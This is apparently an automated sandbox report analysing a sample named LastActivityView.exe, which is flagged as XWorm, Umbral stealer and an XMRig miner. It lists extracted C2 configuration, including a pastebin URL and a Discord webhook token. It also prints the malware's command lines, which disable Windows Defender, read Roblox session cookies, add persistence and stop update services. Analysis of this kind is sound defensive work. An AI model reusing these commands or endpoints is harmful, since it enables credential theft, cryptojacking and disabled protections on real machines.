Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
132s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
06/05/2024, 22:18
Behavioral task
behavioral1
Sample
LastActivityView.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
LastActivityView.exe
Resource
win10v2004-20240419-en
General
-
Target
LastActivityView.exe
-
Size
89KB
-
MD5
499e35df562563babfff6a1d2ee71743
-
SHA1
7bece5115d9df1fa43b6a7a69f9574a498388960
-
SHA256
6ebd5512d5cede4fdf769c35a48727c5fd5acb8ac40ae4c5ea7e9ca37fc8747b
-
SHA512
2df1934de1f45661ab929a7f7658478f5a3d8cacfbe682f1f6b8bee8a49ab2720141a1c0ea74608e14002ff5132cb0932c7fb5b3790575b5e23c5327adfdf377
-
SSDEEP
1536:XQol2xVvTS+KaYKvHUxErb2PPSUF2Q06yG2OklzG2OrSBR27KmhDWP:XQvVqaZsqrbeafQUmklzG2OrUyKdP
Malware Config
Extracted
xworm
https://pastebin.com/raw/R8gFU5SX:123456789
-
Install_directory
%ProgramData%
-
install_file
{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe
-
pastebin_url
https://pastebin.com/raw/R8gFU5SX
Extracted
umbral
https://discord.com/api/webhooks/1237145706423123999/BQqwyjXaKt7KqCLA_iWguAde2fiNgpA36IvFL69WoxRB6yoYhMjlc7o80Exvew2DFX8M
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x000700000001540d-44.dat family_umbral behavioral1/memory/2216-46-0x0000000000D20000-0x0000000000D60000-memory.dmp family_umbral -
Detect Xworm Payload 5 IoCs
resource yara_rule behavioral1/memory/1956-1-0x0000000000A60000-0x0000000000A7C000-memory.dmp family_xworm behavioral1/files/0x000e00000001480e-34.dat family_xworm behavioral1/memory/1004-36-0x0000000000280000-0x000000000029C000-memory.dmp family_xworm behavioral1/memory/1848-89-0x0000000000070000-0x000000000008C000-memory.dmp family_xworm behavioral1/memory/2152-141-0x00000000001D0000-0x00000000001EC000-memory.dmp family_xworm -
XMRig Miner payload 8 IoCs
resource yara_rule behavioral1/memory/2992-136-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2992-135-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2992-131-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2992-130-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2992-134-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2992-133-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2992-137-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2992-138-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2500 powershell.exe 2936 powershell.exe 2460 powershell.exe 240 powershell.exe 1716 powershell.exe 2904 powershell.exe 1780 powershell.exe -
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts rjvwuf.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.lnk LastActivityView.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.lnk LastActivityView.exe -
Executes dropped EXE 6 IoCs
pid Process 1004 {6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe 2216 rjvwuf.exe 1848 {6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe 2852 haoqla.exe 484 Process not Found 332 gmstcccpdzbb.exe -
Loads dropped DLL 5 IoCs
pid Process 1956 LastActivityView.exe 1956 LastActivityView.exe 2672 taskmgr.exe 2672 taskmgr.exe 484 Process not Found -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/2992-126-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2992-128-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2992-136-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2992-135-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2992-131-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2992-130-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2992-134-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2992-127-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2992-133-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2992-129-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2992-125-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2992-137-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2992-138-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2992-139-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052 = "C:\\ProgramData\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe" LastActivityView.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow ioc 6 pastebin.com 7 pastebin.com 8 2.tcp.eu.ngrok.io 17 discord.com 18 discord.com 21 pastebin.com 22 pastebin.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com 4 ip-api.com -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe haoqla.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1432 sc.exe 1472 sc.exe 1836 sc.exe 2100 sc.exe 1852 sc.exe 1456 sc.exe 1704 sc.exe 848 sc.exe 1892 sc.exe 2240 sc.exe 1896 sc.exe 584 sc.exe 1200 sc.exe 888 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 LastActivityView.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier LastActivityView.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2748 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1932 wmic.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS LastActivityView.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion LastActivityView.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate LastActivityView.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName LastActivityView.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 40532fa903a0da01 powershell.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2416 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1956 LastActivityView.exe -
Suspicious behavior: EnumeratesProcesses 35 IoCs
pid Process 2500 powershell.exe 2936 powershell.exe 2460 powershell.exe 240 powershell.exe 1956 LastActivityView.exe 1716 powershell.exe 2108 powershell.exe 1428 powershell.exe 1660 powershell.exe 1524 powershell.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2852 haoqla.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2904 powershell.exe 2852 haoqla.exe 2852 haoqla.exe 2852 haoqla.exe 2852 haoqla.exe 2852 haoqla.exe 2852 haoqla.exe 2852 haoqla.exe 2852 haoqla.exe 2852 haoqla.exe 2852 haoqla.exe 2852 haoqla.exe 2852 haoqla.exe 2852 haoqla.exe 2852 haoqla.exe 332 gmstcccpdzbb.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1956 LastActivityView.exe Token: SeDebugPrivilege 2500 powershell.exe Token: SeDebugPrivilege 2936 powershell.exe Token: SeDebugPrivilege 2460 powershell.exe Token: SeDebugPrivilege 240 powershell.exe Token: SeDebugPrivilege 1956 LastActivityView.exe Token: SeDebugPrivilege 1004 {6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe Token: SeDebugPrivilege 2216 rjvwuf.exe Token: SeDebugPrivilege 1716 powershell.exe Token: SeDebugPrivilege 2108 powershell.exe Token: SeDebugPrivilege 1428 powershell.exe Token: SeDebugPrivilege 1660 powershell.exe Token: SeIncreaseQuotaPrivilege 1668 wmic.exe Token: SeSecurityPrivilege 1668 wmic.exe Token: SeTakeOwnershipPrivilege 1668 wmic.exe Token: SeLoadDriverPrivilege 1668 wmic.exe Token: SeSystemProfilePrivilege 1668 wmic.exe Token: SeSystemtimePrivilege 1668 wmic.exe Token: SeProfSingleProcessPrivilege 1668 wmic.exe Token: SeIncBasePriorityPrivilege 1668 wmic.exe Token: SeCreatePagefilePrivilege 1668 wmic.exe Token: SeBackupPrivilege 1668 wmic.exe Token: SeRestorePrivilege 1668 wmic.exe Token: SeShutdownPrivilege 1668 wmic.exe Token: SeDebugPrivilege 1668 wmic.exe Token: SeSystemEnvironmentPrivilege 1668 wmic.exe Token: SeRemoteShutdownPrivilege 1668 wmic.exe Token: SeUndockPrivilege 1668 wmic.exe Token: SeManageVolumePrivilege 1668 wmic.exe Token: 33 1668 wmic.exe Token: 34 1668 wmic.exe Token: 35 1668 wmic.exe Token: SeIncreaseQuotaPrivilege 1668 wmic.exe Token: SeSecurityPrivilege 1668 wmic.exe Token: SeTakeOwnershipPrivilege 1668 wmic.exe Token: SeLoadDriverPrivilege 1668 wmic.exe Token: SeSystemProfilePrivilege 1668 wmic.exe Token: SeSystemtimePrivilege 1668 wmic.exe Token: SeProfSingleProcessPrivilege 1668 wmic.exe Token: SeIncBasePriorityPrivilege 1668 wmic.exe Token: SeCreatePagefilePrivilege 1668 wmic.exe Token: SeBackupPrivilege 1668 wmic.exe Token: SeRestorePrivilege 1668 wmic.exe Token: SeShutdownPrivilege 1668 wmic.exe Token: SeDebugPrivilege 1668 wmic.exe Token: SeSystemEnvironmentPrivilege 1668 wmic.exe Token: SeRemoteShutdownPrivilege 1668 wmic.exe Token: SeUndockPrivilege 1668 wmic.exe Token: SeManageVolumePrivilege 1668 wmic.exe Token: 33 1668 wmic.exe Token: 34 1668 wmic.exe Token: 35 1668 wmic.exe Token: SeIncreaseQuotaPrivilege 2196 wmic.exe Token: SeSecurityPrivilege 2196 wmic.exe Token: SeTakeOwnershipPrivilege 2196 wmic.exe Token: SeLoadDriverPrivilege 2196 wmic.exe Token: SeSystemProfilePrivilege 2196 wmic.exe Token: SeSystemtimePrivilege 2196 wmic.exe Token: SeProfSingleProcessPrivilege 2196 wmic.exe Token: SeIncBasePriorityPrivilege 2196 wmic.exe Token: SeCreatePagefilePrivilege 2196 wmic.exe Token: SeBackupPrivilege 2196 wmic.exe Token: SeRestorePrivilege 2196 wmic.exe Token: SeShutdownPrivilege 2196 wmic.exe -
Suspicious use of FindShellTrayWindow 20 IoCs
pid Process 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe -
Suspicious use of SendNotifyMessage 20 IoCs
pid Process 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe 2672 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1956 LastActivityView.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1956 wrote to memory of 2500 1956 LastActivityView.exe 29 PID 1956 wrote to memory of 2500 1956 LastActivityView.exe 29 PID 1956 wrote to memory of 2500 1956 LastActivityView.exe 29 PID 1956 wrote to memory of 2936 1956 LastActivityView.exe 31 PID 1956 wrote to memory of 2936 1956 LastActivityView.exe 31 PID 1956 wrote to memory of 2936 1956 LastActivityView.exe 31 PID 1956 wrote to memory of 2460 1956 LastActivityView.exe 33 PID 1956 wrote to memory of 2460 1956 LastActivityView.exe 33 PID 1956 wrote to memory of 2460 1956 LastActivityView.exe 33 PID 1956 wrote to memory of 240 1956 LastActivityView.exe 35 PID 1956 wrote to memory of 240 1956 LastActivityView.exe 35 PID 1956 wrote to memory of 240 1956 LastActivityView.exe 35 PID 1956 wrote to memory of 2748 1956 LastActivityView.exe 37 PID 1956 wrote to memory of 2748 1956 LastActivityView.exe 37 PID 1956 wrote to memory of 2748 1956 LastActivityView.exe 37 PID 2156 wrote to memory of 1004 2156 taskeng.exe 40 PID 2156 wrote to memory of 1004 2156 taskeng.exe 40 PID 2156 wrote to memory of 1004 2156 taskeng.exe 40 PID 1956 wrote to memory of 2216 1956 LastActivityView.exe 41 PID 1956 wrote to memory of 2216 1956 LastActivityView.exe 41 PID 1956 wrote to memory of 2216 1956 LastActivityView.exe 41 PID 2216 wrote to memory of 2372 2216 rjvwuf.exe 42 PID 2216 wrote to memory of 2372 2216 rjvwuf.exe 42 PID 2216 wrote to memory of 2372 2216 rjvwuf.exe 42 PID 2216 wrote to memory of 1716 2216 rjvwuf.exe 44 PID 2216 wrote to memory of 1716 2216 rjvwuf.exe 44 PID 2216 wrote to memory of 1716 2216 rjvwuf.exe 44 PID 2216 wrote to memory of 2108 2216 rjvwuf.exe 46 PID 2216 wrote to memory of 2108 2216 rjvwuf.exe 46 PID 2216 wrote to memory of 2108 2216 rjvwuf.exe 46 PID 2216 wrote to memory of 1428 2216 rjvwuf.exe 48 PID 2216 wrote to memory of 1428 2216 rjvwuf.exe 48 PID 2216 wrote to memory of 1428 2216 rjvwuf.exe 48 PID 2216 wrote to memory of 1660 2216 rjvwuf.exe 50 PID 2216 wrote to memory of 1660 2216 rjvwuf.exe 50 PID 2216 wrote to memory of 1660 2216 rjvwuf.exe 50 PID 2216 wrote to memory of 1668 2216 rjvwuf.exe 52 PID 2216 wrote to memory of 1668 2216 rjvwuf.exe 52 PID 2216 wrote to memory of 1668 2216 rjvwuf.exe 52 PID 2216 wrote to memory of 2196 2216 rjvwuf.exe 54 PID 2216 wrote to memory of 2196 2216 rjvwuf.exe 54 PID 2216 wrote to memory of 2196 2216 rjvwuf.exe 54 PID 2216 wrote to memory of 2804 2216 rjvwuf.exe 56 PID 2216 wrote to memory of 2804 2216 rjvwuf.exe 56 PID 2216 wrote to memory of 2804 2216 rjvwuf.exe 56 PID 2216 wrote to memory of 1524 2216 rjvwuf.exe 58 PID 2216 wrote to memory of 1524 2216 rjvwuf.exe 58 PID 2216 wrote to memory of 1524 2216 rjvwuf.exe 58 PID 2216 wrote to memory of 1932 2216 rjvwuf.exe 60 PID 2216 wrote to memory of 1932 2216 rjvwuf.exe 60 PID 2216 wrote to memory of 1932 2216 rjvwuf.exe 60 PID 2216 wrote to memory of 2400 2216 rjvwuf.exe 62 PID 2216 wrote to memory of 2400 2216 rjvwuf.exe 62 PID 2216 wrote to memory of 2400 2216 rjvwuf.exe 62 PID 2400 wrote to memory of 2416 2400 cmd.exe 64 PID 2400 wrote to memory of 2416 2400 cmd.exe 64 PID 2400 wrote to memory of 2416 2400 cmd.exe 64 PID 2156 wrote to memory of 1848 2156 taskeng.exe 67 PID 2156 wrote to memory of 1848 2156 taskeng.exe 67 PID 2156 wrote to memory of 1848 2156 taskeng.exe 67 PID 1956 wrote to memory of 2852 1956 LastActivityView.exe 68 PID 1956 wrote to memory of 2852 1956 LastActivityView.exe 68 PID 1956 wrote to memory of 2852 1956 LastActivityView.exe 68 PID 1912 wrote to memory of 1696 1912 cmd.exe 78 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2372 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe"C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe"1⤵
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LastActivityView.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LastActivityView.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:240
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052" /tr "C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe"2⤵
- Creates scheduled task(s)
PID:2748
-
-
C:\Users\Admin\AppData\Local\Temp\rjvwuf.exe"C:\Users\Admin\AppData\Local\Temp\rjvwuf.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\rjvwuf.exe"3⤵
- Views/modifies file attributes
PID:2372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\rjvwuf.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:2804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1524
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:1932
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\rjvwuf.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:2416
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\haoqla.exe"C:\Users\Admin\AppData\Local\Temp\haoqla.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2852 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
- Drops file in Windows directory
PID:1696
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:1892
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2240
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:1896
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:584
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:1432
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵PID:2896
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵PID:528
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵PID:904
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵PID:2080
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "XLZQHCLS"3⤵
- Launches sc.exe
PID:888
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "XLZQHCLS" binpath= "C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe" start= "auto"3⤵
- Launches sc.exe
PID:1200
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:1456
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "XLZQHCLS"3⤵
- Launches sc.exe
PID:1472
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {4B9DD97F-64F5-4011-84F4-6DDC103A5D24} S-1-5-21-2248906074-2862704502-246302768-1000:GHPZRGFC\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exeC:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1004
-
-
C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exeC:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe2⤵
- Executes dropped EXE
PID:1848
-
-
C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exeC:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe2⤵PID:2152
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2672
-
C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exeC:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:332 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:1780
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:3068
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1648
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:848
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:1852
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2100
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1836
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1704
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:2268
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:2552
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:756
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:1928
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:1548
-
-
C:\Windows\system32\conhost.execonhost.exe2⤵PID:2992
-
Network
MITRE ATT&CK Enterprise v15
Execution
